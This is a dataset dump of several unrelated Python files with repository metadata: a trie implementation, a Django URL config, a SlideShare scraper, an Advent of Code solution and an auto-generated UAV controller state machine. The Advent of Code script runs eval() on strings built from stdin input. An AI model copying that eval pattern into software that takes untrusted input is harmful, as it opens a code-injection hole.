Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), methyd, cal(p['HC'][2], p['0_H'][2], i), cal(p['HC'][3], p['0_H'][3], i))
Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), hydhyd, cal(p['0_H'][2], p['HC'][2], i), cal(p['0_H'][3], p['HC'][3], i))
| [
"[email protected]"
] | |
19e5b00f91bf0b3b5006b61638f0eaf93703a415 | cbfb679bd068a1153ed855f0db1a8b9e0d4bfd98 | /leet/facebook/strings_arrays/implement_trie(prefix_tree).py | d2417b0002dda188bd8067925406649cf3692fca | [] | no_license | arsamigullin/problem_solving_python | 47715858a394ba9298e04c11f2fe7f5ec0ee443a | 59f70dc4466e15df591ba285317e4a1fe808ed60 | refs/heads/master | 2023-03-04T01:13:51.280001 | 2023-02-27T18:20:56 | 2023-02-27T18:20:56 | 212,953,851 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,538 | py | # this solution is slow but looks right
# we declared TrieNode. It store list of TrieNodes inside of length 26
class TrieNode:
def __init__(self):
self.links = [None] * 26
self.end = False
def get(self, char):
return self.links[ord(char) - ord('a')]
def contains(self, char):
return self.links[ord(char) - ord('a')] != None
def put(self, char, node):
index = ord(char) - ord('a')
self.links[index] = node
def is_end(self):
return self.end
def set_end(self):
self.end = True
class Trie:
def __init__(self):
"""
Initialize your data structure here.
"""
self.root = TrieNode()
def insert(self, word: str) -> None:
"""
Inserts a word into the trie.
"""
node = self.root
for ch in word:
if not node.contains(ch):
node.put(ch, TrieNode())
node = node.get(ch)
node.set_end()
def __search_prefix(self, word):
node = self.root
for ch in word:
if node.contains(ch):
node = node.get(ch)
else:
return None
return node
def search(self, word: str) -> bool:
"""
Returns if the word is in the trie.
"""
node = self.__search_prefix(word)
return node is not None and node.is_end()
def startsWith(self, prefix: str) -> bool:
"""
Returns if there is any word in the trie that starts with the given prefix.
"""
node = self.__search_prefix(prefix)
return node is not None
# Your Trie object will be instantiated and called as such:
# obj = Trie()
# obj.insert(word)
# param_2 = obj.search(word)
# param_3 = obj.startsWith(prefix)
# this solution is much faster but underneath it uses dict
class TrieDict:
def __init__(self):
"""
Initialize your data structure here.
"""
self.root = dict()
def insert(self, word: str) -> None:
"""
Inserts a word into the trie.
"""
currNode = self.root
for c in word:
if c not in currNode:
currNode[c] = dict()
currNode = currNode[c]
# this placeholder denotes the end of a string
# consider these two words abcc and abccd
# after inserting the words to the trie we have
# {'a': {'b': {'c': {'c': {'#': '#'}}}}}
# {'a': {'b': {'c': {'c': {'#': '#', 'd': {'#': '#'}}}}}}
# when searching the word after reaching the latest letter in word
# we also check if the '#' among children of the latest letter
# so the '#' allows us to say if the whole word (not prefix) is in the Trie
currNode['#'] = '#'
print(self.root)
def search(self, word: str) -> bool:
"""
Returns if the word is in the trie.
"""
currNode = self.root
for c in word:
if c not in currNode:
return False
currNode = currNode[c]
return '#' in currNode
def startsWith(self, prefix: str) -> bool:
"""
Returns if there is any word in the trie that starts with the given prefix.
"""
currNode = self.root
for c in prefix:
if c not in currNode:
return False
currNode = currNode[c]
return True
if __name__ == "__main__":
s = TrieDict()
s.insert("abcc")
s.insert("abccd")
| [
"[email protected]"
] | |
bd99ee4471270f22b8beb7ca1b17ae9959c13aaf | 5b39000731517e9e77db789f2d253fd8dd1bbcda | /gamesapi/gamesapi/urls.py | e87a1ec8d70bd1ded577a1eb37dcf1bfc7176ec9 | [] | no_license | bunnycast/RestAPI | 831a01c592ff91bebb410f060aaa8f19c7b40361 | 1f2b6837342a04c59752119eebb16a7eeeecaa4c | refs/heads/master | 2022-11-16T21:25:26.485393 | 2020-07-20T03:12:52 | 2020-07-20T03:12:52 | 276,662,261 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 910 | py | """gamesapi URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
url(r'^', include('games.urls')),
url(r'^api-auth/', include('rest_framework.urls')), # api logIn, logOut
]
| [
"[email protected]"
] | |
37c1b77dd3586311b40f194e2b54e9d3196a58e6 | f874b3bffdf98ea52a12f9cd08566557e33d4c98 | /extract_info.py | 661aedd6a01faa476fa02e92316332480fa98e79 | [
"Apache-2.0"
] | permissive | lmorillas/recursoscaa | 8e567246f722a38a7fb61dd6a884fd0d153cd338 | bac2ff39d67028ca8d4969d23f5061f09be59a0e | refs/heads/master | 2018-12-28T00:24:31.042017 | 2015-08-29T08:13:23 | 2015-08-29T08:13:23 | 32,229,559 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,684 | py | from amara.bindery import html
from amara.lib import U
from urlparse import urljoin
doc = html.parse('http://es.slideshare.net/JosManuelMarcos/presentations')
doc2 = html.parse('http://es.slideshare.net/JosManuelMarcos/presentations/2')
links = []
datos = []
def extract_links(doc):
return doc.xml_select('//ul[@class="thumbnailFollowGrid"]/li//a')
links.extend(extract_links(doc))
links.extend(extract_links(doc2))
print len(links), 'recursos a extraer ...'
def encode_data(d):
for k in d.keys():
d[k] = d[k].encode('utf-8')
return d
def extract_data(link):
item = {}
_link = urljoin('http://es.slideshare.net/', U(link.href))
_doc = html.parse(_link)
if doc:
print _link
item['url'] = _link
item['id'] = _link.split('/')[-1]
item['autor'] = []
_label = U(_doc.xml_select('//h1[contains(@class, "slideshow-title-text")]')).strip()
if u'Romero' in _label:
item['autor'].append('David Romero')
item['autor'].append(U(_doc.xml_select('//a[@class="j-author-name"]')).strip())
item['label'] = _label.split('-')[0].strip()
item['fecha'] = U(_doc.xml_select('//time[@itemprop="datePublished"]')).strip()
_desc = U(_doc.xml_select('//p[contains(@class, "j-desc-expand")]')).strip()
if _desc:
item['desc'] = _desc
else:
item['desc'] = U(_doc.xml_select('//div[contains(@class, "j-desc-more")]')).strip()
item['imagen'] = _doc.xml_select(u'//img[contains(@class, "slide_image")]')[0].src
return item
datos = [extract_data(l) for l in links]
import json
json.dump({'items': datos}, open('datos.json', 'w'))
'''
d2 = html.parse(urljoin('http://es.slideshare.net/', l)
print d2.xml_encode()
d2.xml_select('//time')
map(d2.xml_select('//time'), lambda x: print x)
map( lambda x: print x, d2.xml_select('//time'))
lambda x: print x
__version__
version
_version_
print d2.xml_select('//time')[0]
print d2.xml_select('//time')[1]
print d2.xml_select('//time[@itemprop="datePublished"]')
print d2.xml_select('//time[@itemprop="datePublished"]')[0]
print d2.xml_select('//time[@itemprop="datePublished"]')[0]
print d2.xml_select('//a[@class="j-author-name"]/text()')
print d2.xml_select('//a[@class="j-author-name"]')
print d2.xml_select('//a[@class="j-author-name"]')
from amara.lib import U
print U(d2.xml_select('//a[@class="j-author-name"]')).strip()
print U(d2.xml_select('//div[contains(@class, "j-desc-more")]')).strip()
print U(d2.xml_select('//a[contains(@class, "j-download")]')).strip()
history
''' | [
"[email protected]"
] | |
d7043a83bf47e5a0fc3d1216e5b5cab408f81ede | 11a246743073e9d2cb550f9144f59b95afebf195 | /advent/2017/day8.py | 6b9e3586e8658bcf41dbd5263b00183231315b58 | [] | no_license | ankitpriyarup/online-judge | b5b779c26439369cedc05c045af5511cbc3c980f | 8a00ec141142c129bfa13a68dbf704091eae9588 | refs/heads/master | 2020-09-05T02:46:56.377213 | 2019-10-27T20:12:25 | 2019-10-27T20:12:25 | 219,959,932 | 0 | 1 | null | 2019-11-06T09:30:58 | 2019-11-06T09:30:57 | null | UTF-8 | Python | false | false | 574 | py | from collections import *
import itertools
import random
import sys
def main():
d = defaultdict(int)
ans = -19
for line in sys.stdin:
words = line.strip().split()
d_reg = words[0]
sgn = 1 if words[1] == 'inc' else -1
amt = int(words[2])
reg = words[4]
e = words[5]
amt2 = int(words[6])
val = d[reg]
if eval(str(val) + ' ' + e + ' ' + str(amt2)):
d[d_reg] += sgn * amt
# ans = max(ans, (max(v for k, v in d.items())))
print(max(v for k, v in d.items()))
main()
| [
"[email protected]"
] | |
ef5631e014a978f3699b26c20792af4d65ded2c5 | c6c002d37878c78f9199e30a6d0c2127257552e0 | /ctrls/Goal6_8/G6_8Pos7_1Ori2.py | ffd26bb34a11c4d3f06839ccabb29ad14464f64e | [] | no_license | carrilloec12/FireUAVs | 900a79810a5d610dc467fe82fa276bb14b7ffe9d | 019f12a947fa4d5bcc99d20ccb85925160430370 | refs/heads/master | 2020-03-21T08:03:10.478162 | 2018-06-22T15:09:50 | 2018-06-22T15:09:50 | 138,316,479 | 0 | 0 | null | 2018-06-22T15:06:54 | 2018-06-22T15:06:54 | null | UTF-8 | Python | false | false | 24,090 | py | class TulipStrategy(object):
"""Mealy transducer.
Internal states are integers, the current state
is stored in the attribute "state".
To take a transition, call method "move".
The names of input variables are stored in the
attribute "input_vars".
Automatically generated by tulip.dumpsmach on 2018-06-21 17:12:48 UTC
To learn more about TuLiP, visit http://tulip-control.org
"""
def __init__(self):
self.state = 17
self.input_vars = ['Fire', 'StopSignal']
def move(self, Fire, StopSignal):
"""Given inputs, take move and return outputs.
@rtype: dict
@return: dictionary with keys of the output variable names:
['sys_actions', 'loc', 'Base', 'GoalPos']
"""
output = dict()
if self.state == 0:
if (Fire == False) and (StopSignal == False):
self.state = 1
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 2
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 3
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == True):
self.state = 4
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 1:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 2:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 3:
if (Fire == True) and (StopSignal == True):
self.state = 16
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == False) and (StopSignal == False):
self.state = 13
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == True) and (StopSignal == False):
self.state = 14
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == False) and (StopSignal == True):
self.state = 15
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
else:
self._error(Fire, StopSignal)
elif self.state == 4:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 5:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 6:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 7:
if (Fire == False) and (StopSignal == False):
self.state = 9
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == True) and (StopSignal == False):
self.state = 10
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == False) and (StopSignal == True):
self.state = 11
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == True) and (StopSignal == True):
self.state = 12
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
else:
self._error(Fire, StopSignal)
elif self.state == 8:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 9:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 10:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 11:
if (Fire == False) and (StopSignal == False):
self.state = 9
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == True) and (StopSignal == False):
self.state = 10
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == False) and (StopSignal == True):
self.state = 11
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == True) and (StopSignal == True):
self.state = 12
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
else:
self._error(Fire, StopSignal)
elif self.state == 12:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 13:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 14:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 15:
if (Fire == True) and (StopSignal == True):
self.state = 16
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == False) and (StopSignal == False):
self.state = 13
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == True) and (StopSignal == False):
self.state = 14
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == False) and (StopSignal == True):
self.state = 15
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
else:
self._error(Fire, StopSignal)
elif self.state == 16:
if (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == False):
self.state = 5
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
else:
self._error(Fire, StopSignal)
elif self.state == 17:
if (Fire == False) and (StopSignal == False):
self.state = 0
output["loc"] = 'Pos7_1Ori2'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 2
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 3
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == True):
self.state = 4
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 6
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == False) and (StopSignal == True):
self.state = 7
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == True):
self.state = 8
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Go'
elif (Fire == True) and (StopSignal == False):
self.state = 10
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == False) and (StopSignal == True):
self.state = 11
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == True) and (StopSignal == True):
self.state = 12
output["loc"] = 'Pos7_3Ori4'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == True) and (StopSignal == False):
self.state = 14
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == False) and (StopSignal == True):
self.state = 15
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
elif (Fire == True) and (StopSignal == True):
self.state = 16
output["loc"] = 'Pos8_2Ori1'
output["Base"] = False
output["GoalPos"] = False
output["sys_actions"] = 'Stop'
else:
self._error(Fire, StopSignal)
else:
raise Exception("Unrecognized internal state: " + str(self.state))
return output
def _error(self, Fire, StopSignal):
raise ValueError("Unrecognized input: " + (
"Fire = {Fire}; "
"StopSignal = {StopSignal}; ").format(
Fire=Fire,
StopSignal=StopSignal))
| [
"[email protected]"
] | |
ac0f764daad78adf59a5a4d76ef3847794467db5 | a86dd51331fe333d2ad5ad6e88cec8e2993b1b56 | /nodeconfeu_watch/convert/__init__.py | 63c2729139fbef6bd859bc44be1c6c337840f758 | [
"Apache-2.0"
] | permissive | paulcockrell/nodeconfeu-gesture-models | 792c5ae6ce0153964c05372ccf14d579922c5976 | db645fa914bdc634d5888d40b2d5d75262506ccd | refs/heads/master | 2022-08-28T21:10:17.452641 | 2020-05-15T15:47:30 | 2020-05-15T15:47:30 | 264,165,155 | 0 | 0 | NOASSERTION | 2020-05-15T10:29:57 | 2020-05-15T10:29:56 | null | UTF-8 | Python | false | false | 40 | py |
from .export_tflite import ExportModel
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.